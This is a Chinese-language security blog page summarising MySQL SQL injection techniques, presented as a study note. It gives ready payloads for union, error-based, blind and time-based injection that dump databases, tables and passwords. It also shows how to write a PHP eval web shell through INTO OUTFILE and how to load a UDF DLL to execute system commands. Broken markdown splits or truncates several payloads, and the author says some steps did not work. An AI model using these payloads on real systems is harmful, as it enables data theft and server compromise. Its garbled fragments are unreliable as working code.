<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="injection," />










<meta name="description" content="###一个详细的总结 0x01 注入导图 0x02 基于有正确回显的注入1.判断注入点 2.测试是否存在过滤及绕过 3.猜字段数(1).order by(2).select intoSELECT INTO 语句从一个表中选取数据，然后把数据插入另一个表中。 SELECT INTO 语句常用于创建表的备份复件或者用于对记录进行存档。SQL SELECT INTO 语法您可以把所有的列插入新表：123">
<meta name="keywords" content="injection">
<meta property="og:type" content="article">
<meta property="og:title" content="injection.md">
<meta property="og:url" content="http://yoursite.com/2018/05/26/Summary of SQL injection/index.html">
<meta property="og:site_name" content="Ratten3anger">
<meta property="og:description" content="###一个详细的总结 0x01 注入导图 0x02 基于有正确回显的注入1.判断注入点 2.测试是否存在过滤及绕过 3.猜字段数(1).order by(2).select intoSELECT INTO 语句从一个表中选取数据，然后把数据插入另一个表中。 SELECT INTO 语句常用于创建表的备份复件或者用于对记录进行存档。SQL SELECT INTO 语法您可以把所有的列插入新表：123">
<meta property="og:image" content="http://yoursite.com/2018/05/26/Summary%20of%20SQL%20injection/SQL%20injection/1.jpg">
<meta property="og:image" content="http://yoursite.com/2018/05/26/Summary%20of%20SQL%20injection/SQL%20injection/2.jpg">
<meta property="og:updated_time" content="2018-06-06T12:43:43.699Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="injection.md">
<meta name="twitter:description" content="###一个详细的总结 0x01 注入导图 0x02 基于有正确回显的注入1.判断注入点 2.测试是否存在过滤及绕过 3.猜字段数(1).order by(2).select intoSELECT INTO 语句从一个表中选取数据，然后把数据插入另一个表中。 SELECT INTO 语句常用于创建表的备份复件或者用于对记录进行存档。SQL SELECT INTO 语法您可以把所有的列插入新表：123">
<meta name="twitter:image" content="http://yoursite.com/2018/05/26/Summary%20of%20SQL%20injection/SQL%20injection/1.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/05/26/Summary of SQL injection/"/>





  <title>injection.md | Ratten3anger</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Ratten3anger</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Security is a plain learning.安全こそ素朴な学問である。</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Startseite
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archiv
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/05/26/Summary of SQL injection/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Ratten3anger">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Ratten3anger">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">injection.md</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Veröffentlicht am</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2018-05-26T21:56:46+08:00">
                2018-05-26
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>###一个详细的总结</p>
<p><strong>0x01 注入导图</strong><br><img src="./SQL injection/1.jpg" alt="injection"></p>
<p><strong>0x02 基于有正确回显的注入</strong><br>1.判断注入点</p>
<p>2.测试是否存在过滤及绕过</p>
<p>3.猜字段数<br>(1).order by<br>(2).select into<br>SELECT INTO 语句从一个表中选取数据，然后把数据插入另一个表中。</p>
<p>SELECT INTO 语句常用于创建表的备份复件或者用于对记录进行存档。<br>SQL SELECT INTO 语法<br>您可以把所有的列插入新表：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">SELECT *</span><br><span class="line">INTO new_table_name [IN externaldatabase] </span><br><span class="line">FROM old_tablename</span><br></pre></td></tr></table></figure></p>
<p>或者只把希望的列插入新表：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">SELECT column_name(s)</span><br><span class="line">INTO new_table_name [IN externaldatabase] </span><br><span class="line">FROM old_tablename</span><br></pre></td></tr></table></figure></p>
<p>!()[./SQL injection/1.png]<br>4.联合查询:<br><del>假设有三个字段</del></p>
<p><li>爆库</li></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">或者</span><br><span class="line"></span><br><span class="line">```id=-1&apos; union select 1,2,group_concat(schema_name) from information_schema.schemata --+</span><br></pre></td></tr></table></figure>
<p><li>爆表名</li></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">或者使用database()函数</span><br><span class="line">&lt;li&gt;爆列名</span><br><span class="line"></span><br><span class="line">```id=-1&apos; union select 1,2,group_concat(column_name) from information_schema.columns where table_name=&apos;user&apos; --+</span><br></pre></td></tr></table></figure>
<p><li>爆数据：</li></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Tips:</span><br><span class="line"></span><br><span class="line">&gt;有时候可能当前页面数据库和敏感信息数据库不是同一个库，所以有时候会这样写,以申明查询目标所在库</span><br><span class="line">```id=-1’ union select 1,username,password from security.users limit 0,1 -–+</span><br></pre></td></tr></table></figure>
<p>或者<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">**0x03 基于报错的注入**</span><br><span class="line">1.几个函数</span><br><span class="line">①Group by: 分组，合并相同的，并且按字母顺序排列。</span><br><span class="line"></span><br><span class="line">②rand() // 随机函数（0，1）</span><br><span class="line"></span><br><span class="line">③floor() //取整函数 比如floor(1.2)=1 </span><br><span class="line"></span><br><span class="line">④count() //汇总函数</span><br><span class="line"></span><br><span class="line">2.原理</span><br><span class="line"></span><br><span class="line">利用select count(),concat(floor(rand(0)2)) as key from …… group by key报错</span><br><span class="line">即rand函数产生的随机数取整之后被 group by 子句被分为key值等于1 和0 两类，然后count()统计该类型下的个数</span><br><span class="line"></span><br><span class="line">为什么会报错:</span><br><span class="line">&gt;双注入的原理，简单一句话原理就是有研究人员发现，当在一个聚合函数，比如count函数后面如果使用分组语句（group by）就会把查询的一部分以错误的形式显示出来“通过floor报错的方法来爆数据的本质是group by语句的报错。</span><br><span class="line">Group by 在分组的时候先会对前面的concat(floor(rand()*2))进行检测，无疑只有0和1 两种结果 进行分类，然后就会插入这条数据 插入的过程中又会再进行一次计算 如果**检测所计算出来的数和插入时所计算出来的数不一样**，这个时候就会报错。</span><br><span class="line"></span><br><span class="line">3.栗子</span><br><span class="line"></span><br><span class="line">&lt;li&gt;爆库：</span><br><span class="line"></span><br><span class="line">```id=-1&apos; and (select 1 from (select count(*),concat(0x3a,(select schema_name from information_schema.schemata limit 0,1),floor(rand()*2),0x3a,0x3a)name from information_schema.tables gruop by name) b) --+``` </span><br><span class="line">&lt;li&gt;爆表名</span><br><span class="line">&lt;li&gt;爆列名</span><br><span class="line">&lt;li&gt;爆数据：</span><br><span class="line"></span><br><span class="line">```?id=-1&apos; and  (select 1  from (select count(*),concat(0x3a,(select password from users limit 0,1 ),floor(rand()*2 ),0x3a,0x3a )name from  information_schema.tables group by name) b) --+</span><br></pre></td></tr></table></figure></p>
<p>可简化为：<figure class="highlight plain"><figcaption><span>count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2)) --+```</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">如果关键的表被禁用了，可以使用这种形式</span><br><span class="line"></span><br><span class="line">```select count(*) from (select 1 union select null union select !1) group by concat(version(),floor(rand(0)*2))</span><br></pre></td></tr></table></figure></p>
<p>测试显示ERROR 1248 (42000): Every derived table must have its own alias<br>如果rand被禁用了可以使用系统变量来报错,赋名为”:”的系统变量值为1<br><figure class="highlight plain"><figcaption><span>min(@a:</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">测试可行</span><br><span class="line">4.另外九种报错方式</span><br><span class="line">1.extractvalue()</span><br><span class="line"></span><br><span class="line">```select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));</span><br></pre></td></tr></table></figure></p>
<p>2.updataxml()</p>
<figure class="highlight plain"><figcaption><span>* from test where id</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">3.geometrycollection()</span><br><span class="line"></span><br><span class="line">```select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));		//与floor报错一样</span><br></pre></td></tr></table></figure>
<p>4.multipoint()</p>
<figure class="highlight plain"><figcaption><span>* from test where id</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">5.polygon()</span><br><span class="line"></span><br><span class="line">```select * from test where id=1 and polygon((select * from(select * from(select user())a)b));</span><br></pre></td></tr></table></figure>
<p>6.multipolygon()</p>
<figure class="highlight plain"><figcaption><span>* from test where id</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">7.linestring()</span><br><span class="line"></span><br><span class="line">```select * from test where id=1 and linestring((select * from(select * from(select user())a)b));</span><br></pre></td></tr></table></figure>
<p>8.multilinestring()</p>
<figure class="highlight plain"><figcaption><span>* from test where id</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">9.exp()</span><br><span class="line"></span><br><span class="line">```select * from test where id=1 and exp(~(select * from(select user())a));</span><br></pre></td></tr></table></figure>
<p><strong>0x04 使用insert、update、delect进行注入</strong><br>1.以updatexml()为例<br>updatexml(XML_document,XPath_string,new_value);<br>XML_document是String格式，为XML文档对象的名称，文中为Doc<br>XPath_string (Xpath格式的字符串),如果不了解Xpath语法，可以在网上查找教程。<br>new_value String格式，替换查找到的符合条件的数据<br>作用：改变文档中符合条件的节点的值<br>payload:<br><figure class="highlight plain"><figcaption><span>updatexml(1,concat(0x7e,(version())),0) or```</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">Insert：</span><br><span class="line"></span><br><span class="line">```INSERT INTO users (id, username, password) VALUES (2,&apos;Olivia&apos; or updatexml(1,concat(0x7e,(version())),0) or&apos;&apos;, &apos;Nervo&apos;);</span><br></pre></td></tr></table></figure></p>
<p>Update：</p>
<figure class="highlight plain"><figcaption><span>users SET password</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br><span class="line">Delete：</span><br><span class="line"></span><br><span class="line">```DELETE FROM users WHERE id=2 or updatexml(1,concat(0x7e,(version())),0) or&apos;&apos;;</span><br></pre></td></tr></table></figure>
<p>以上均未复现成功<br>关于爆库、表、列等均是一样，不做赘述</p>
<p>2.利用name_const()获取数据<br>name_const()函数是MYSQL5.0.12版本加入的一个返回给定值的函数。当用来产生一个结果集合列时 , NAME_CONST() 促使该列使用给定名称。<br>Payload：</p>
<figure class="highlight plain"><figcaption><span>(SELECT * FROM (SELECT(name_const(version(),1)),name_const(version(),1))a) or```</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">在最新的MYSQL版本中，使用name_const()函数只能提取到数据库的版本信息。但是在一些比较旧的高于5.0.12(包括5.0.12)的MYSQL版本中，可以进一步提取更多数据。故不再赘述</span><br><span class="line"></span><br><span class="line">一次获取多个信息：</span><br><span class="line">```select @ from (select(@:=0x00),(select @ from test.a where (id&gt;@) and @ i</span><br><span class="line">n (@:=concat(0x2a,@,id,num))))a</span><br></pre></td></tr></table></figure>
<p>关于变量使用：mysql中@指系统变量<br>设定时这样写:<br><figure class="highlight plain"><figcaption><span>@t1</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select @t1,@t2,......</span><br></pre></td></tr></table></figure></p>
<p>3.更多闭合变种：<br><figure class="highlight plain"><figcaption><span>or (payload) or '</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&apos; and (payload) and &apos;</span><br><span class="line">&apos; or (payload) and &apos;</span><br><span class="line">&apos; or (payload) and &apos;=&apos;</span><br><span class="line">&apos;* (payload) *&apos;</span><br><span class="line">&apos; or (payload) and &apos;</span><br><span class="line">&quot; – (payload) – &quot;</span><br></pre></td></tr></table></figure></p>
<ol>
<li>几何函数<br>geometrycollection()<br>multipoint()<br>原理：利用mysql_error(),构造报错语句，通过报错时返回的数据，来获取数据</li>
<li>procedure analyse()<br>[LIMIT {[offset,] row_count | row_count OFFSET offset}]<br>[PROCEDURE procedure_name(argument_list)]</li>
<li>using name_const():<br>补： select语句使用函数报错的位置: select , where , group by , order by 。//列名重复</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">boolean型报错注入</span><br><span class="line"></span><br><span class="line">```select (if(version()&gt;5,2,1))*1e308</span><br></pre></td></tr></table></figure>
<p>转移报错</p>
<figure class="highlight plain"><figcaption><span>convert(concat('a',id),signed)</span><a href="//复现发现回显情况与预期不符```(类型的转换)">link</a></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">整形溢出报错</span><br><span class="line">```</span><br></pre></td></tr></table></figure>
<p>**报错原理之深入研究<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">**0x05 基于文件读写权限的注入**</span><br><span class="line">1.条件</span><br><span class="line">需要my.ini(phpstudy中)里面的 secur_file_priv变量为空，不敢一般MySQL5.5.53之前的版本默认为空，之后的版本为null，所以说这种注入比较依赖MySQL的版本。</span><br><span class="line">可以使用：select @@secure_file_priv来查询权限。</span><br><span class="line">关于secur_file_priv变量：</span><br><span class="line">&gt;如果变量设置为目录的名称，则服务器会将导入和导出操作限制在跟这个目录中一起使用。这个目录必须存在，服务器不会自己创建它。</span><br><span class="line">如果变量为空，则不会产生影响，引起不安全的配置。</span><br><span class="line">如果变量设置为NULL，那么服务器就会禁用导入和导出操作。这个值从MySQL 5.5.53版本开始允许。</span><br><span class="line">此外，该系统变量只允许读</span><br><span class="line"></span><br><span class="line">3.一些函数</span><br><span class="line">(1)load_file: 读取文件</span><br><span class="line">(2)into dumpfile/outfile: 将表的内容导出为一个文本文件</span><br><span class="line"></span><br><span class="line">&gt;Tips：</span><br><span class="line">INTO OUTFILE函数写文件时会在每一行的结束自动加上换行符</span><br><span class="line">INTO DUMPFILE函数在写文件会保持文件得到原生内容，这种方式对于二进制文件是最好的选择</span><br><span class="line"></span><br><span class="line">4.演示:</span><br><span class="line">```select * from users into outfile ‘d:/1.txt’;</span><br><span class="line">select load_file(‘d:/1.txt’)</span><br></pre></td></tr></table></figure></p>
<p><img src="./SQL injection/2.jpg" alt="injection"><br>或者直接写入shell:<br><figure class="highlight plain"><figcaption><span>'<?php eval($_POST['syclover']);?>'into outfile "filepath"```</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">5.实际:</span><br><span class="line">&lt;li&gt;用菜刀连接</span><br><span class="line">```?id=1&apos;)) union select 1,2,0x3c3f70687020706870696e666f28293b3f3e into outfile &apos;D:/phpStudy/www/1234.php&apos;   --+</span><br></pre></td></tr></table></figure></p>
<p><li>改扩展名绕过操作：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">6.区别:</span><br><span class="line">dumpfile只能导出一行数据</span><br><span class="line">若我们想把一个可执行2进制文件用into outfile函数导出,</span><br><span class="line">事实上,导出后就会被破坏</span><br><span class="line"> </span><br><span class="line">因为into outfile函数会在行末端写入新行更致命的是会转义换行符</span><br><span class="line">这样的话这个2进制可执行文件就会被破坏</span><br><span class="line"> </span><br><span class="line">这时候我们用into dumpfile就能导出一个完整能执行的2进制文件</span><br><span class="line">into dumpfile函数不对任何列或行进行终止也不执行任何转义处理</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line">如在无web脚本执行，但是有mysql root执行的环境下我们就可以通过</span><br><span class="line">into dump函数导入udf.dll进行提权</span><br><span class="line"></span><br><span class="line">```mysql&gt; show variable like &apos;%plugin%&apos;;</span><br></pre></td></tr></table></figure></li></p>
<p>+—————-+——————————————+<br>|Variable_name   | Value                                    |<br>+—————-+——————————————+<br>| plugin_dir     |c:\mysql\mysql server 5.1\lib/plugin      |<br>+—————-+——————————————+</p>
<figure class="highlight plain"><figcaption><span>select unhex('udf.dll hex code') into dumpfile 'c:/mysql/mysql server 5.1/lib/plugin/xxoo.dll';</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select * from func; #查看是否有人创建过udf 如果有就可以省略</span><br><span class="line">mysql&gt; create function MyCmd returns string soname &apos;&apos;c:/mysql/mysql server 5.1/lib/plugin/xxoo.dll&apos;;</span><br><span class="line">mysql&gt; select MyCmd(&apos;whoami&apos;);</span><br></pre></td></tr></table></figure>
<p><del>本地复现没有成功</del></p>
<p>一点小知识点:</p>
<p>如何获取该udf.dll文件的16进制值(hex)?<br>我们可以本地搭建mysql环境，找个可以用的udf.dll文件 、，行下面操作<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select hex(load_file (&apos;c:/windows/temp/xxoo.dll&apos;)) into outfile &apos;c:/windows/temp/xxoo.txt&apos;;</span><br></pre></td></tr></table></figure></p>
<p><strong>0x06 盲注</strong><br>1.相关函数：<br>①length():返回字符串的长度<br>②substr():截取字符串<br>substr(a,b,c)从b位置开始，截取字符串a的c长度，ascii()将字符转换为ascii码格式。<br>③ascii():返回字符的ascii码<br>④if():<br>If(exor1,expr2,expr3)在mysql中是第一个参数成立的时候执行第二个参数，否则执行第三个参数<br>2.布尔型盲注：<br>(1).截断函数<br>mid()<br>left()<br>(2).正则匹配<br>regexp()<br>like<br>(3).判断函数<br>ifnull(expr1,expr2)<br>利用and or的逻辑判断 通过判断页面是否正常回显，来判断<br>payload:<br><figure class="highlight plain"><figcaption><span>(left((select database()),1))</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">```and (select database() regexp &apos;^ad&apos;)=1</span><br></pre></td></tr></table></figure></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">3.时间型盲注实际操作：</span><br><span class="line">①判断注入点：</span><br><span class="line"></span><br><span class="line">```id=-1&apos; or sleep(5) --+</span><br></pre></td></tr></table></figure>
<p>②爆库：</p>
<figure class="highlight plain"><figcaption><span>schema_name from information_schema.schemata limit 0,1),1,1))</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">③爆表</span><br><span class="line">④爆字段</span><br><span class="line">⑤爆数据</span><br><span class="line">都是一样的套路</span><br><span class="line"></span><br><span class="line">Tips：</span><br><span class="line">substr()的小技巧：例如在substr(database(),1,1)中逗号被过滤了，我们可以使用from 1 to 1来绕过过滤。</span><br><span class="line">那么有同样格式的limit 0,1有没有这样的绕过呢？当然有。格式为：1 offset 0这里注查询数字的顺序</span><br><span class="line"></span><br><span class="line">也可以这样写：</span><br><span class="line">```select sleep(find_in_set(mid(@@version,1,1),&apos;0,1,2,3,4,5,6,7,8,9,.&apos;));</span><br><span class="line">select sleep(find_in_set(mid(@@version,1,2),&apos;0,1,2,3,4,5,6,7,8,9,.&apos;));</span><br></pre></td></tr></table></figure>
<p>推荐使用sleep而不要使用benchmark，因为sleep不会占用cpu而且比较稳定。<br>几个函数：<br>mid():用于从文本字段中提取字符 SELECT MID(column_name,start[,length]) FROM table_name;<br>find_in_set():在目标字符串中查找子字符串<br>locate():返回子串 substr 在字符串 str 中第一次出现的位置<br>比如有一个2个记录的表</p>
<figure class="highlight plain"><figcaption><span>count(*) from test;</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">+----------+</span><br><span class="line">| count(*) |</span><br><span class="line">+----------+</span><br><span class="line">|        2 |</span><br><span class="line">+----------+</span><br></pre></td></tr></table></figure>
<p>如果直接查询，因为两个记录都会引发查询所以会触发两次sleep()延迟12秒</p>
<figure class="highlight plain"><figcaption><span>* from test where sleep(locate(mid(@@version, 1, 1), '0123456789.'));</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Empty set (12.00 sec)</span><br></pre></td></tr></table></figure>
<p>这里在前面使用一个条件语句，因为and前面的表达式如果为false则后面的不执行，所以sleep执行一次，延迟6秒</p>
<figure class="highlight plain"><figcaption><span>* from test where a</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Empty set (6.00 sec)</span><br></pre></td></tr></table></figure>
<p>3.关于盲注的更多扩展：<br><strong>使用位运算进行盲注：</strong><br>ord():以一个字符（长度为1的字符串）作为参数，返回对应的 ASCII 数值，或者 Unicode 数值，如果所给的 Unicode 字符超出了你的 Python 定义范围，则会引发一个 TypeError 的异常。<br>我们主要使用与运算，它的原理是每次请求确定二进制的一位，对于ascii码连续的区间时间复杂度为log(n)*length，所以相对于二分查找，它应用起来比较有局限性。<br>位与运算符 ( &amp; ) ：对应的二进制位都为 1 ，则该位的运算结果为 1 ，否则为 0<br><figure class="highlight plain"><figcaption><span>select ord('a') & 1;</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">+--------------+</span><br><span class="line">| ord(&apos;a&apos;) &amp; 1 |</span><br><span class="line">+--------------+</span><br><span class="line">|            1 |</span><br><span class="line">+--------------+</span><br><span class="line">1 row in set (0.00 sec)</span><br><span class="line">mysql&gt; select ord(&apos;a&apos;) &amp; 2;</span><br><span class="line">+--------------+</span><br><span class="line">| ord(&apos;a&apos;) &amp; 2 |</span><br><span class="line">+--------------+</span><br><span class="line">|            0 |</span><br><span class="line">+--------------+</span><br><span class="line">1 row in set (0.00 sec)</span><br><span class="line">mysql&gt; select ord(&apos;a&apos;) &amp; 117;</span><br><span class="line">+----------------+</span><br><span class="line">| ord(&apos;a&apos;) &amp; 117 |</span><br><span class="line">+----------------+</span><br><span class="line">|             97 |</span><br><span class="line">+----------------+</span><br><span class="line">1 row in set (0.00 sec)</span><br></pre></td></tr></table></figure></p>
<p>4.不同的时间盲注的五种方法<br>(1).sleep()<br>(2).benchmark()<br>(3).笛卡儿积</p>
